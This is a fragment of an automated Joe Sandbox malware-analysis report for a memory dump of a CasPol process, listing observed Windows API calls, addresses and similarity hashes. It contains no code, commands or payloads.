                                                                                                                  • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3669619086-0
                                                                                                                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                  • malloc.MSVCRT ref: 00417407
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                  • free.MSVCRT ref: 00417425
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2605342592-0
                                                                                                                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5